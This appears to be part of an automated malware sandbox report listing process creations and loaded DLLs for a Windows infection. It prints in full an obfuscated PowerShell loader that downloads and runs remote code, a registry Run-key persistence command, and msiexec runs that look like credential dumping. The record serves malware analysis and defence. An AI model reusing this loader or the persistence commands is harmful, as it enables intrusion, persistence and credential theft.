biPuckTMed (Rage$PicaUMetaNClamAUdstCPastuA teTAeroE kse2 er7Gt,eMLa,dp.tagAVaans ikoTBarbOPulsEUngrdSamf)Himm ');Nondeclaratively (Dark $Unpliantness);$beskftigelsesinteressen=$Klarlagtes[0];$Kakar=(Dark 'tr.i$Tut g DenlR.adOVrdibCru aWordLs.de:.pkaGSkadROve,uOronnArkidEft V edgOOpfaL.rendFdesE ,roN OmgsPutr= BedNSlamED mpW rad-vapooFeatB IntjP liEKa,scRemstHumi FodbS hiy Ad,SSurrTS.ioESkosmTils. aefNOpbyEWhartLykk. RebW A.se AlbbCommcF rlLAn,eISla,ESam N PieTSeku ');Nondeclaratively ($Kakar);Nondeclaratively (Da
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Paremernes duplicature Udvejer Dataservicens Treasury Ostleress Uninterdicted #>;$Cryoscopy='Grusgrav';<#Dubbe Bantustamme Nyvurderende Tripudiate Mitigated #>; function Dark($Misligholdelsers){If ($host.DebuggerEnabled) {$Differentieringens++;}$Sadomasochism=$Cariss+$Misligholdelsers.'Length'-$Differentieringens; for( $Unacute27=4;$Unacute27 -lt $Sadomasochism;$Unacute27+=5){$Unaccommodable=$Unacute27;$Enforth+=$Misligholdelsers[$Unacute27];$Cutireaction='Blomstringstiderne';}$Enforth;}function Nondeclaratively($Budcyklen){ . ($Dolomitternes) ($Budcyklen);}$Skrllede=Dark 'StaiMC clo eftzF stiRagelRi elStyra ogn/Thra ';$Stupiditetens=Dark 'KrypTSvenl PresU ne1 nde2unav ';$Unpliantness=' lus[MashNFldee My T Fal.AnthsD coehistrru dVS stIEngrCBefaeTilgPTortO BogiSangNOpspTMa.iMNonfA awnNSkruASamlgLibeEZygoR lit]Vaga:Sovj:AlecSMyogECuphcP esUGennRDisci C aTSkjuy BasP iggRV.rgo Ga tGonioCam.c.eclOTrevlSvrm= Ven$Net sEndeTconcu.seuptomaiRoveDGoveIFagkT UnmE TraTGastEFravn R.ms Unp ';$Skrllede+=Dark 'Regi5Majo.Mau.0 Opd Simo(Tip WTer iF lgnChrodBusho Priw .orsUnsh j,nsN MolTBuff Fora1Side0Fod ..ast0Ni n;Vilj AnfgW KreieftenMaka6Svir4Unpr;Str, ParxLine6 Uns4.nde;beru beedrAfkavGoat:Gene1 Un 3Sang1 up.Miss0fo m) Mor AandGDiskeRee cturbkMorpo dta/Nive2 Res0Drop1slad0Skuf0Arch1K,nd0.dst1 Ri tetFAeroi ConrStofe ,lifEnteo ,dkxTreu/A,te1V ra3Cod 1 Hdr.Fo r0Etym ';$Signatarmagters=Dark ' reu FyrsBivoe PosRIle - alASneaG WayeIsodN J mTGe e ';$beskftigelsesinteressen=Dark 'Hre hS petTraft nkp Ka,sLoai:Inex/ Co /DowneConivYn leUndesIntaeVerdc TmrrCaroeOlivtPrin.M,timGou aCyl /LokaM,adeigarasRecefAutoo ylbrForlsL.rat,orpa Pina Po e.egil Slfs WifeKbenr RetnReckeRejs. Autp,heesGroum,itr ';$Unacute27mpastoed=Dark 'Volu> Nyt ';$Dolomitternes=Dark 'archiConsEForbX Skr ';$nyhedsbureauernes='Forfatningsdomstol';$Cynography='\Satisfiable.Ins';Nondeclaratively (Dark 'Hort$AmphgSyrilLa gOBo abVaa ASh nL Und:VellsFdsekTestiMassLBys.s We,mSterIStilsstokSHan eSt erGuld1reva8 Rov=Rumi$ FleeGiarNUnsuvCons: efeAT rbPMicrPH lkDSpriAAntiTForsAColi+Unfo$Ges.CFo.lYKam NSta OOp,jgFallR BriA .enpTrasHBarkyHyae ');Nondeclaratively (Dark ' ,ns$LavtgMonsL VinoCharB c aaCatcL D,n:sc,pKSambl regAL ngR ympLSpriAPsy GImmotba.keHortSGdni= par$SavsbMicreDiscSBrackMel FPyr TTilbI,oncGBe oe TimlEnchsBuckEBrneSExosIGaseN,aklTBlgee Ranr R,seChroSUnpesRek,e Eu NDise. DaySFolkpRedelIn biPuckTMed (Rage$PicaUMetaNClamAUdstCPastuA teTAeroE kse2 er7Gt,eMLa,dp.tagAVaans ikoTBarbOPulsEUngrdSamf)Himm ');Nondeclaratively (Dark $Unpliantness);$beskftigelsesinteressen=$Klarlagtes[0];$Kakar=(Dark 'tr.i$Tut g DenlR.adOVrdibCru aWordLs.de:.pkaGSkadROve,uOronnArkidEft V edgOOpfaL.rendFdesE ,roN OmgsPutr= BedNSlamED mpW rad-vapooFeatB IntjP liEKa,scRemstHumi FodbS hiy Ad,SSurrTS.ioESkosmTils. aefNOpbyEWhartLykk. RebW A.se AlbbCommcF rlLAn,eISla,ESam N PieTSeku ');Nondeclaratively ($Kak
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Udstiller35" /t REG_EXPAND_SZ /d "%Atlantad% -windowstyle 1 $Dogship=(gp -Path 'HKCU:\Software\Badder\').Trigonocephaly;%Atlantad% ($Dogship)"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Udstiller35" /t REG_EXPAND_SZ /d "%Atlantad% -windowstyle 1 $Dogship=(gp -Path 'HKCU:\Software\Badder\').Trigonocephaly;%Atlantad% ($Dogship)"
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\fdoktovrfxxseixhmgrhbttuogexale"
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\fdoktovrfxxseixhmgrhbttuogexale"
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\fdoktovrfxxseixhmgrhbttuogexale"
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\fdoktovrfxxseixhmgrhbttuogexale"
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\qyucuggstgpeoollwrdamgokovwgtwvpgi"
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\sahvvz"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden " <#Paremernes duplicature Udvejer Dataservicens Treasury Ostleress Uninterdicted #>;$Cryoscopy='Grusgrav';<#Dubbe Bantustamme Nyvurderende Tripudiate Mitigated #>; function Dark($Misligholdelsers){If ($host.DebuggerEnabled) {$Differentieringens++;}$Sadomasochism=$Cariss+$Misligholdelsers.'Length'-$Differentieringens; for( $Unacute27=4;$Unacute27 -lt $Sadomasochism;$Unacute27+=5){$Unaccommodable=$Unacute27;$Enforth+=$Misligholdelsers[$Unacute27];$Cutireaction='Blomstringstiderne';}$Enforth;}function Nondeclaratively($Budcyklen){ . ($Dolomitternes) ($Budcyklen);}$Skrllede=Dark 'StaiMC clo eftzF stiRagelRi elStyra ogn/Thra ';$Stupiditetens=Dark 'KrypTSvenl PresU ne1 nde2unav ';$Unpliantness=' lus[MashNFldee My T Fal.AnthsD coehistrru dVS stIEngrCBefaeTilgPTortO BogiSangNOpspTMa.iMNonfA awnNSkruASamlgLibeEZygoR lit]Vaga:Sovj:AlecSMyogECuphcP esUGennRDisci C aTSkjuy BasP iggRV.rgo Ga tGonioCam.c.eclOTrevlSvrm= Ven$Net sEndeTconcu.seuptomaiRoveDGoveIFagkT UnmE TraTGastEFravn R.ms Unp ';$Skrllede+=Dark 'Regi5Majo.Mau.0 Opd Simo(Tip WTer iF lgnChrodBusho Priw .orsUnsh j,nsN MolTBuff Fora1Side0Fod ..ast0Ni n;Vilj AnfgW KreieftenMaka6Svir4Unpr;Str, ParxLine6 Uns4.nde;beru beedrAfkavGoat:Gene1 Un 3Sang1 up.Miss0fo m) Mor AandGDiskeRee cturbkMorpo dta/Nive2 Res0Drop1slad0Skuf0Arch1K,nd0.dst1 Ri tetFAeroi ConrStofe ,lifEnteo ,dkxTreu/A,te1V ra3Cod 1 Hdr.Fo r0Etym ';$Signatarmagters=Dark ' reu FyrsBivoe PosRIle - alASneaG WayeIsodN J mTGe e ';$beskftigelsesinteressen=Dark 'Hre hS petTraft nkp Ka,sLoai:Inex/ Co /DowneConivYn leUndesIntaeVerdc TmrrCaroeOlivtPrin.M,timGou aCyl /LokaM,adeigarasRecefAutoo ylbrForlsL.rat,orpa Pina Po e.egil Slfs WifeKbenr RetnReckeRejs. Autp,heesGroum,itr ';$Unacute27mpastoed=Dark 'Volu> Nyt ';$Dolomitternes=Dark 'archiConsEForbX Skr ';$nyhedsbureauernes='Forfatningsdomstol';$Cynography='\Satisfiable.Ins';Nondeclaratively (Dark 'Hort$AmphgSyrilLa gOBo abVaa ASh nL Und:VellsFdsekTestiMassLBys.s We,mSterIStilsstokSHan eSt erGuld1reva8 Rov=Rumi$ FleeGiarNUnsuvCons: efeAT rbPMicrPH lkDSpriAAntiTForsAColi+Unfo$Ges.CFo.lYKam NSta OOp,jgFallR BriA .enpTrasHBarkyHyae ');Nondeclaratively (Dark ' ,ns$LavtgMonsL VinoCharB c aaCatcL D,n:sc,pKSambl regAL ngR ympLSpriAPsy GImmotba.keHortSGdni= par$SavsbMicreDiscSBrackMel FPyr TTilbI,oncGBe oe TimlEnchsBuckEBrneSExosIGaseN,aklTBlgee Ranr R,seChroSUnpesRek,e Eu NDise. DaySFolkpRedelIn biPuckTMed (Rage$PicaUMetaNClamAUdstCPastuA teTAeroE kse2 er7Gt,eMLa,dp.tagAVaans ikoTBarbOPulsEUngrdSamf)Himm ');Nondeclaratively (Dark $Unpliantness);$beskftigelsesinteressen=$Klarlagtes[0];$Kakar=(Dark 'tr.i$Tut g DenlR.adOVrdibCru aWordLs.de:.pkaGSkadROve,uOronnArkidEft V edgOOpfaL.rendFdesE ,roN OmgsPutr= BedNSlamED mpW rad-vapooFeatB IntjP liEKa,scRemstHumi FodbS hiy Ad,SSurrTS.ioESkosmTils. aefNOpbyEWhartLykk. RebW A.se AlbbCommcF rlLAn,eISla,ESam N PieTSeku ');Nondeclaratively ($Kakar);Nondeclaratively (DaJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Udstiller35" /t REG_EXPAND_SZ /d "%Atlantad% -windowstyle 1 $Dogship=(gp -Path 'HKCU:\Software\Badder\').Trigonocephaly;%Atlantad% ($Dogship)"Jump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\fdoktovrfxxseixhmgrhbttuogexale"Jump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\fdoktovrfxxseixhmgrhbttuogexale"Jump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\fdoktovrfxxseixhmgrhbttuogexale"Jump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\fdoktovrfxxseixhmgrhbttuogexale"Jump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\qyucuggstgpeoollwrdamgokovwgtwvpgi"Jump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\sahvvz"Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Udstiller35" /t REG_EXPAND_SZ /d "%Atlantad% -windowstyle 1 $Dogship=(gp -Path 'HKCU:\Software\Badder\').Trigonocephaly;%Atlantad% ($Dogship)"Jump to behavior
                Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdatauser.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: slc.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
